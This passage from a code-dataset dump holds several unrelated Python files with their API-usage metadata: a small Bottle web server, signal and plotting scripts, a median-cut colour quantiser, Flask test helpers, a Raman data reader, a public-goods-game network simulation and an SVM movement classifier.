"line_number": 216, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 216, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 227, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 227, "usage_type": "name"}, {"api_name": "torch.nn.Parameter", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 230, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 230, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 231, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 231, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 236, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 236, "usage_type": "name"}, {"api_name": "GuidedFilter.guided_filter.ConvGuidedFilter", "line_number": 244, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 245, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 246, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 246, "usage_type": "name"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 248, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.functional.interpolate", "line_number": 258, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 258, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 265, "usage_type": "call"}]} +{"seq_id": "635348556", "text": "\"\"\"\nSet up website, point to index.html and supporting files. \n\nThink MVC not directory structure!\nOrig path: '/LOC/Falcon/Falcon/static'\n\"\"\"\n\nimport bottle as web\nimport os\n\n\n# Simple primary file (basic network force)\n@web.route('/simple')\ndef index():\n path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n print('path: ' + path)\n return web.static_file('simple.html', root=path)\n\n\n# Primary file (Family Network Force via template)\n@web.route('/')\n@web.route('/')\n@web.view('d3andme')\ndef index(name='World'):\n #path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n #print('path: ' + path)\n return dict(name=name)\n\n\n# Resource files\n@web.route('/resource/')\ndef index(filename):\n res_path = os.path.dirname(os.path.realpath(__file__)) + r'\\resources'\n print('res_path: ' + res_path)\n return web.static_file(filename, root=res_path)\n\n\n# Application files\n@web.route('/app/')\ndef index(filename):\n app_path = os.path.dirname(os.path.realpath(__file__)) + r'\\app'\n print('app_path: ' + app_path)\n return web.static_file(filename, root=app_path)\n\n\n# Data files\n@web.route('/data/')\ndef index(filename):\n data_path = os.path.dirname(os.path.realpath(__file__)) + r'\\data'\n print('data_path: ' + data_path)\n return web.static_file(filename, root=data_path)\n\n\nweb.run(host='localhost', port=8080, debug=True)\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 15, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 17, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 13, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 22, "usage_type": "call"}, {"api_name": "bottle.view", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 33, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 35, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 41, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 43, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 49, "usage_type": "call"}, {"api_name": "bottle.static_file", "line_number": 51, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 47, "usage_type": "call"}, {"api_name": "bottle.run", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "278561451", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.io.wavfile import write\n\ntid = 2\nfs = 8000\nf = 440\ntt = np.arange(0, tid, 1/fs)\nx = np.cos(2*np.pi*f*tt)\nplt.plot(tt[1:200],x[1:200])\nplt.show()\n# write('uppg1.wav', fs, x)\n", "sub_path": "RÖ1/RO1_uppg1.py", "file_name": "RO1_uppg1.py", "file_ext": "py", "file_size_in_byte": 235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 9, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 10, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 10, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 11, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 11, "usage_type": "name"}]} +{"seq_id": "616276164", "text": "from PIL import Image\r\n\r\ncolorTable = []\r\ncolorLUT = []\r\n\r\n# 获取原图像的所有颜色\r\ndef getColorTable(image):\r\n width = image.width\r\n height = image.height\r\n for x in range(width):\r\n for y in range(height):\r\n r, g, b = image.getpixel((x, y))\r\n cube = (r,g,b)\r\n colorTable.append(cube)\r\n\r\n# 根据r, g, b的排序函数\r\ndef sortByR(cube):\r\n return cube[0]\r\n\r\ndef sortByG(cube):\r\n return cube[1]\r\n\r\ndef sortByB(cube):\r\n return cube[2]\r\n\r\n# 中位切分算法\r\ndef medianCut(slice, times):\r\n length = len(slice)\r\n if times >= 8:\r\n rSum = 0\r\n gSum = 0\r\n bSum = 0\r\n for i in range(length):\r\n rSum += slice[i][0]\r\n gSum += slice[i][1]\r\n bSum += slice[i][2]\r\n newCube = (rSum / length, gSum / length, bSum / length)\r\n colorLUT.append(newCube)\r\n return\r\n if times % 3 == 0:\r\n slice.sort(key=sortByR)\r\n elif times % 3 == 1:\r\n slice.sort(key=sortByG)\r\n else:\r\n slice.sort(key=sortByB)\r\n medianCut(slice[:length//2], times+1)\r\n medianCut(slice[length//2:], times+1)\r\n\r\n# 计算距离\r\ndef getDis(cube1, cube2):\r\n r = cube1[0] - cube2[0]\r\n g = cube1[1] - cube2[1]\r\n b = cube1[2] - cube2[2]\r\n return r*r + g*g + b*b\r\n\r\n# 获取最短欧式距离的颜色\r\ndef getNewColor(cube):\r\n length = len(colorLUT)\r\n index = 0\r\n dis = getDis(cube, colorLUT[0])\r\n for i in range(length):\r\n newDis = getDis(cube, colorLUT[i])\r\n if newDis < dis:\r\n index = i\r\n dis = newDis\r\n return colorLUT[index]\r\n\r\n# 生成新的8位彩色图像\r\ndef toNewImage(image):\r\n width = image.width\r\n height = image.height\r\n img = Image.new(\"RGB\", (width, height))\r\n for x in range(width):\r\n for y in range(height):\r\n r, g, b = image.getpixel((x, y))\r\n cube = (r,g,b)\r\n colorCube = getNewColor(cube)\r\n img.putpixel((x, y), (int(colorCube[0]), int(colorCube[1]), int(colorCube[2])))\r\n return img\r\n\r\ndef main():\r\n times = 0\r\n img = Image.open(\"redapple.jpg\")\r\n getColorTable(img)\r\n medianCut(colorTable, times)\r\n resImage = toNewImage(img)\r\n resImage.save(\"p2resImg.jpg\", \"JPEG\")\r\n\r\nmain()\r\n", "sub_path": "Multimedia/Homework/Hw1/陈亚楠+16340041+作业1/实验代码/Problem2.py", "file_name": "Problem2.py", "file_ext": "py", "file_size_in_byte": 2280, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PIL.Image.new", "line_number": 72, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 72, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "629708919", "text": "from bs4 import BeautifulSoup\nfrom lbrc_flask.database import db\n\n\ndef login(client, faker):\n s = faker.site_details()\n u = faker.user_details()\n u.site = s\n db.session.add(s)\n db.session.add(u)\n db.session.commit()\n\n resp = client.get(\"/login\")\n soup = BeautifulSoup(resp.data, \"html.parser\")\n\n crf_token = soup.find(\n \"input\", {\"name\": \"csrf_token\"}, type=\"hidden\", id=\"csrf_token\"\n )\n\n data = dict(email=u.email, password=u.password)\n\n if crf_token:\n data[\"csrf_token\"] = crf_token.get(\"value\")\n\n client.post(\"/login\", data=data, follow_redirects=True)\n\n return u\n\n\ndef add_content_for_all_areas(faker, user):\n study = faker.study_details()\n study.owners.append(user)\n study.collaborators.append(user)\n\n db.session.add(study)\n\n upload = faker.upload_details()\n upload.completed = False\n upload.study = study\n upload.uploader = user\n\n db.session.add(upload)\n\n db.session.commit()\n\n return (study, upload)\n", "sub_path": "tests/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "lbrc_flask.database.db.session.add", "line_number": 9, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 9, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 9, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 10, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 10, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 10, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.commit", "line_number": 11, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 11, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 11, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 35, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 35, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 35, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.add", "line_number": 42, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 42, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 42, "usage_type": "name"}, {"api_name": "lbrc_flask.database.db.session.commit", "line_number": 44, "usage_type": "call"}, {"api_name": "lbrc_flask.database.db.session", "line_number": 44, "usage_type": "attribute"}, {"api_name": "lbrc_flask.database.db", "line_number": 44, "usage_type": "name"}]} +{"seq_id": "219286105", "text": "import pandas as pd\nfrom scipy.signal import detrend\n\n\ndef reader_single_point(filename, normalize=False, remove_offset=False):\n \"\"\"\n Reader for raman spectrometry files of a single location.\n\n Parameters\n ----------\n filename: str\n with filename\n normalize: bool\n Normalize to maximum (max of the counts will be 1)\n\n remove_offset:bool\n Remove linear offset using detrend from scipy. Mostly for visualization\n\n Returns\n -------------\n data: pandas dataframe with two columns: wavenumber and intensity\n header: metadata from the measurement\n \"\"\"\n data = pd.read_csv(filename, comment='#', sep='\\t', index_col=False, names=['wavenumber', 'intensity'])\n if normalize:\n min = data.intensity.min()\n max = data.intensity.max()\n data.intensity = data.intensity.apply(lambda x: ((x - min) / (max - min)))\n\n if remove_offset:\n data.intensity = detrend(data.intensity, type='linear')\n\n return data\n", "sub_path": "ramanpy/read_experiment.py", "file_name": "read_experiment.py", "file_ext": "py", "file_size_in_byte": 998, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pandas.read_csv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.signal.detrend", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "507332476", "text": "# coding = utf-8\r\nimport networkx as ne # 导入建网络模型包,命名ne\r\nimport numpy as np\r\nfrom random import choice\r\nimport math\r\nimport uuid\r\n#from savegraph2mssql import Savegraph2SQLServer\r\nfrom PGG_base import PGGBase\r\nimport matplotlib.pyplot as plt\r\n\r\n#PoissonCDF = [0.0000, 0.0005, 0.0076, 0.0458, 0.1550, 0.3472, 0.5760, 0.7720, 0.8987, 0.9626, 0.9884]\r\n#PoissonCDF = [0.0000, 0.0404, 0.1246, 0.2650, 0.4404, 0.6159, 0.7621, 0.8666, 0.9319, 0.9681, 0.9863,0.9945,0.9979,0.9993,0.9997,0.99993,0.99998,0.99999,0.99999,0.99999,0.99999]\r\nT_value = 40\r\nPoissonCDF = [0.000000000,\r\n 0.000499399,\r\n 0.002769396,\r\n 0.010336051,\r\n 0.029252688,\r\n 0.067085963,\r\n 0.130141421,\r\n 0.220220647,\r\n 0.332819679,\r\n 0.457929714,\r\n 0.583039750,\r\n 0.696776146,\r\n 0.791556476,\r\n 0.864464423,\r\n 0.916541527,\r\n 0.951259597,\r\n 0.972958390,\r\n 0.985722386,\r\n 0.992813495,\r\n 0.996545658,\r\n 0.998411739,\r\n 0.999300349,\r\n 0.999704263,\r\n 0.999704263,\r\n 0.999953050,\r\n 0.999982319,\r\n 0.999993577,\r\n 0.999997746,\r\n 0.999999235,\r\n 0.999999749,\r\n 0.999999920,\r\n 0.999999975,\r\n 0.999999992,\r\n 0.999999997,\r\n 0.999999999,\r\n 1,\r\n 1,\r\n 1,\r\n 1,\r\n 1,\r\n 1]\r\n\r\n\r\n\r\n\r\nclass PGG_Edge_Breaking_Rule(PGGBase):\r\n\r\n def edges_evolve(self):\r\n #edge_remove_list = []\r\n\r\n for u, v in self.g.edges:\r\n d_times0 = int(self.g[u][v]['Satisfaction'][0])\r\n if d_times0 > T_value:\r\n d_times0 = T_value\r\n if d_times0 < 0:\r\n d_times0 = 0\r\n d_times1 = int(self.g[u][v]['Satisfaction'][1])\r\n if d_times1 > T_value:\r\n d_times1 = T_value\r\n if d_times1 < 0:\r\n d_times1 = 0\r\n p_remove_edge0 = PoissonCDF[d_times0]\r\n p_remove_edge1 = PoissonCDF[d_times1]\r\n\r\n if p_remove_edge0 > np.random.random() or p_remove_edge1 > np.random.random():\r\n\r\n self.g.remove_edge(u,v)\r\n if self.g.nodes[u]['Strategy'] == 'C':\r\n oldnode = u\r\n else:\r\n oldnode = v\r\n\r\n newnodes = []\r\n \r\n surroundings = 0\r\n surrounding = 0\r\n for neighbor in self.g.neighbors(oldnode):\r\n if self.g.nodes[oldnode]['id'] > self.g.nodes[neighbor]['id']:\r\n surroundings = surroundings + self.g[oldnode][neighbor]['Satisfaction'][0]\r\n else:\r\n surroundings = surroundings + self.g[oldnode][neighbor]['Satisfaction'][1]\r\n\r\n if self.g.degree[oldnode] != 0:\r\n surrounding = surroundings/self.g.degree[oldnode]\r\n\r\n part_choice = (1 / (1 + np.exp(-surrounding)))\r\n #part_choice = surrounding/20\r\n #like = -5 and unlike = 5 and r = 2.9\r\n if np.random.random() > part_choice and surroundings < 0 and self.g.degree[oldnode] != 0:\r\n \r\n for neighbor in self.g.neighbors(oldnode):\r\n if self.g.nodes[oldnode]['id'] > self.g.nodes[neighbor]['id']:\r\n key = self.g[oldnode][neighbor]['Satisfaction'][0]\r\n else:\r\n key = surroundings + self.g[oldnode][neighbor]['Satisfaction'][1]\r\n\r\n for k_nei in self.g.neighbors(neighbor):\r\n if self.g.has_edge(oldnode,k_nei) == False:\r\n newnodes.append(k_nei)\r\n if newnodes != []:\r\n newnode = choice(newnodes)\r\n #if len(newnodes) != 0:\r\n #print('内部选择')\r\n if newnodes == []:\r\n \r\n for j in self.g.nodes:\r\n if (self.g.nodes[j]['id'] != self.g.nodes[u]) and (\r\n self.g.nodes[j]['id'] != self.g.nodes[v]) and self.g.has_edge(oldnode,j) == False:\r\n newnodes.append(j)\r\n newnode = choice(newnodes)\r\n\r\n #newnode = choice(newnodes)\r\n\r\n self.g.add_edge(newnode, oldnode)\r\n\r\n self.g[oldnode][newnode]['id'] = str(uuid.uuid1())\r\n self.g[oldnode][newnode]['Satisfaction'] = [0,0]\r\n self.g[oldnode][newnode]['Weight'] = 0\r\n self.g[oldnode][newnode]['income_i_o'] = 0\r\n self.g[oldnode][newnode]['income_i_p'] = 0\r\n self.g[oldnode][newnode]['income_j_o'] = 0\r\n self.g[oldnode][newnode]['income_j_p'] = 0\r\n #edge_remove_list.append(edge_remove)\r\n #self.g.remove_edges_from(edge_remove_list)\r\n '''\r\n for i in edge_remove_list:\r\n if np.random.random() > 0:\r\n #print('fc',fc)\r\n newnodes = []\r\n for j in self.g.nodes:\r\n if (self.g.nodes[j]['id'] != self.g.nodes[i[0]]) and (self.g.nodes[j]['id'] != self.g.nodes[i[1]]):\r\n newnodes.append(j)\r\n newnode = choice(newnodes)\r\n if self.g.nodes[i[0]]['Strategy'] == 'C':\r\n oldnode = i[0]\r\n self.g.add_edge(newnode,i[0])\r\n else:\r\n self.g.add_edge(newnode, i[1])\r\n oldnode = i[1]\r\n\r\n self.g[oldnode][newnode]['id'] = str(uuid.uuid1())\r\n self.g[oldnode][newnode]['Weight'] = 0\r\n self.g[oldnode][newnode]['type'] = 'N'\r\n self.g[oldnode][newnode]['income_i_o'] = 0\r\n self.g[oldnode][newnode]['income_i_p'] = 0\r\n self.g[oldnode][newnode]['income_j_o'] = 0\r\n self.g[oldnode][newnode]['income_j_p'] = 0\r\n '''\r\n\r\n\r\n def break_game(self, CCount):\r\n return self.g.number_of_edges()==0 or CCount == self.g.number_of_nodes()\r\n\r\n #def save_graph_stat_info(self, game_times, CCount):\r\n #self.msg.SaveGraphMDe(game_times, CCount)\r\n\r\n\r\ndef main():\r\n repeat_times = 10\r\n\r\n p0 = 0.55\r\n k = 0.1\r\n game_times = 1000 \r\n node_num = 1000\r\n '''\r\n r = 1.0\r\n while r < 8.01:\r\n i = 0\r\n while i < repeat_times:\r\n ge = NxPGG_Edge_Rule1('regular_graph', node_num, p0, 4, True)\r\n ge.game(r=r, k=k, game_times=game_times)\r\n i += 1\r\n r += 1.0\r\n '''\r\n r = 2\r\n while r < 2.001:\r\n print('r:',r)\r\n i = 0\r\n while i < repeat_times:\r\n ge = PGG_Edge_Breaking_Rule('regular_graph', node_num, p0, 4, True)\r\n ge.game(r=r, k=k, game_times=game_times)\r\n i += 1\r\n r += 0.1\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "PGG_breaking.py", "file_name": "PGG_breaking.py", "file_ext": "py", "file_size_in_byte": 7299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "PGG_base.PGGBase", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 78, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 102, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 114, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 123, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 129, "usage_type": "call"}]} +{"seq_id": "335737121", "text": "# Importing the libraries\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os\n\n# Get file names \n\npath = os.getcwd()\n\nfolders = []\n\n# r=root, d=directories, f = files\nfor r, d, f in os.walk(path):\n for folder in d:\n print(folder)\n folders.append(os.path.join(r, folder))\n\nfor f in folders:\n print(f)\n\n# Load in all files\n\nds_move = []\nds_var = [];\nds_std = [];\nds_slp = [];\nds_mean = []\n\nfor x in range(len(folders)):\n temp = os.listdir(folders[x])\n os.chdir(folders[x])\n #print(\"Temp is changing folders to \", temp)\n for c in range(len(os.listdir(folders[x]))):\n #if not c.strip(): continue # skip the empty line\n print(x);\n dataset = pd.read_csv(temp[c], sep=\",\", header=None);\n dataset.columns = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\n dataset = dataset.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n ds_move.append(x);\n ds_mean.append((dataset.mean()/10000).tolist());\n ds_var.append(dataset.var().tolist());\n ds_std.append(dataset.std().tolist());\n ds_slp.append(dataset.apply(lambda x: np.polyfit(dataset.index, x, 1)[0]).tolist());\n \n \n\n# separate the 2\n# =============================================================================\n# print(\"---------------------------------------\") \n# means.append(ds_mean)\n# var.append(ds_var)\n# std.append(ds_std)\n# slp.append(ds_slp)\n# ds_var = []\n# ds_slp = []\n# ds_std = []\n# ds_mean = [] \n# =============================================================================\n\n#visulizing slopes\n# =============================================================================\n# \n# for i in dataset.columns:\n# plt.scatter(dataset.index, dataset[i], label=i)\n# plt.plot(np.polyval(np.polyfit(dataset.index, dataset[i], 1), dataset.index))\n# \n# plt.legend()\n# plt.show()\n# \n# \n# # Visualize\n# plt.figure(12)\n# plt.plot(dataset.acc_x)\n# \n# plt.plot(dataset.acc_y)\n# \n# plt.plot(dataset.acc_z)\n# \n# =============================================================================\n\n\ntest_1 = ds_mean[10]\ntest_2 = ds_mean[2000]\ntest_3 = ds_mean[1000]\ntests = [test_1, test_2, test_3]\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(ds_mean, ds_move, test_size = 0.25)\n\n#X_train/10000\n#X_test/10000\n#print(X_train[:10], \"\\n\", X_test[:10])\n# Feature Scaling\n#from sklearn.preprocessing import StandardScaler\n#sc = StandardScaler()\n#X_train = sc.fit_transform(X_train)\n#X_test = sc.transform(X_test)\n\n\n# Fitting SVM to the Training set\nfrom sklearn.svm import SVC\nclassifier = SVC(probability=True)\nclassifier.fit(X_train, y_train)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\n\n# Making the Confusion Matrix\nfrom sklearn.metrics import confusion_matrix, accuracy_score\ncm = confusion_matrix(y_test, y_pred)\nacc = accuracy_score(y_test, y_pred)\n\n\n#Test\ndata = pd.read_csv(\"data_3.txt\", sep=\",\", header=None);\ndata.columns = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\ndata = data.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n\ndata_mean = []\ndata_mean.append((data.mean()/10000).tolist());\n\ndata_pred = classifier.predict_proba(data_mean)\nplt.figure(13)\nplt.plot(data.acc_x)\n \nplt.plot(data.acc_y)\n \nplt.plot(data.acc_z)\n\ndata = pd.read_csv(\"4.txt\", sep=\",\", header=None);\ndata.columns = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyr_x\", \"gyr_y\", \"gyr_z\", \"mag_x\", \"mag_y\", \"mag_z\"];\ndata = data.drop([\"mag_x\", \"mag_y\", \"mag_z\"], axis = 1)\n\nplt.figure(2)\nplt.plot(data.acc_x)\n \nplt.plot(data.acc_y)\n \nplt.plot(data.acc_z)\n", "sub_path": "Machine Learning/ML_movement.py", "file_name": "ML_movement.py", "file_ext": "py", "file_size_in_byte": 3725, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 9, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 31, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 32, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 90, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 104, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 112, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 130, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 130, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}]} +{"seq_id": "326791068", "text": "import os\nimport csv\nimport pandas\nimport matplotlib.pyplot as plt\nimport functools \nimport random\nf = ['googleplaystore.csv', 'googleplaystore_user_reviews.csv']\n\ndef Q():\n name = []\n flag = 0\n csvfile = open(f[0], 'r', encoding='utf-8')\n T = []\n for row in csv.reader(csvfile, delimiter=','): \n T.append(row)\n \n return T\n \nos.chdir('G:\\\\VM_SYNC\\\\JYT-ML\\\\HW1')\n\ndata = pandas.read_csv('googleplaystore.csv')\n\ndf = pandas.DataFrame(data)\n\n\n#['App', 'Category', 'Rating', 'Reviews', 'Size', 'Installs', 'Type', 'Price', 'Content Rating', 'Genres', 'Last Updated', 'Current Ver','Android Ver']\n\n\n#清除上一次產生的圖片\n\nfor index in [1,2,3,4,5]:\n try:\n os.remove(df.columns[index]+'.png')\n except:\n pass\n\n# --------------------\n# Category.png\n# --------------------\n\nFig1 = df[['Category',df.columns[0]]].groupby('Category').count()\nFig1.plot.bar(figsize=(20,15))\nplt.savefig('Category'+'.png')\n\n# --------------------\n# Rating.png\n# --------------------\n\nFig2 = df[[ 'Rating',df.columns[0]]].groupby( 'Rating').count()\nFig2.plot.bar(figsize=(20,15))\nplt.savefig( 'Rating'+'.png')\n\n# --------------------\n# Installs.png\n# --------------------\n\ndef cmp(a,b):\n if a=='Free':\n return -1\n if b=='Free':\n return 1\n if len(a) < len(b):\n return -1\n return 1\n\nFig5 = df[['Installs',df.columns[0]]].groupby('Installs').count()\nX = Fig5.index.tolist()\nY = Fig5['App'].tolist()\nD = dict( zip(X,Y) )\nX.sort(key=functools.cmp_to_key(cmp))\nE = []\nF = []\nfor a in X:\n E.append(a)\n F.append(D.get(a))\nFig5 = pandas.DataFrame(F,index=E)\nFig5.plot.bar(figsize=(20,15))\nplt.savefig('Installs'+'.png')\n\n# --------------------\n# Reviews.png\n# --------------------\n\nplt.cla()\nFig3 = df['Reviews'].tolist()\nFig3 = [int(x.replace('M','000000').replace('K','000').replace('.','')) for x in Fig3]\nA = [ x for x in range(0,len(Fig3)) ] \nrandom.shuffle(A)\nplt.scatter(A ,Fig3)\nplt.savefig('Reviews'+'.png')\n\n# --------------------\n# Size.png\n# --------------------\nFig4 = df['Size'].tolist()\n\ninterval = ['0','1','5','10', '20','40', '100',]\ncounter = {'0~1M':0,'1M+':0,'5M+':0,'10M+':0,'20M+':0,'40M+':0,'100M+':0, 'Varies with device':0}\nfor x in Fig4:\n if x == 'Varies with device':\n counter['Varies with device'] += 1\n continue\n sc = 0\n if x[-1] == 'M':\n sc = float(x.replace('M',''))*1000\n elif x[-1] == 'B':\n sc = float(x.replace('K',''))*1\n \n if sc <= 1000:\n counter['0~1M']+=1\n elif sc < 5000:\n counter['1M+']+=1\n elif sc < 10000:\n counter['5M+']+=1\n elif sc < 20000:\n counter['10M+']+=1\n elif sc < 40000:\n counter['20M+']+=1\n elif sc < 100000:\n counter['40M+']+=1\n else:\n counter['100M+']+=1\n \n #print(x,sc)\nE = []\nF = []\nfor x in counter.keys():\n E.append(x)\n F.append(counter.get(x))\nFig4 = pandas.DataFrame(F,index=E)\nFig4.plot.bar(figsize=(20,15))\nplt.savefig('Size'+'.png')\n\n'''\nreply = df[['App', df.columns[2]]].groupby('App').count()\nreply1 = df['App'].value_counts()\n#框出兩欄資料 然後groupby app name 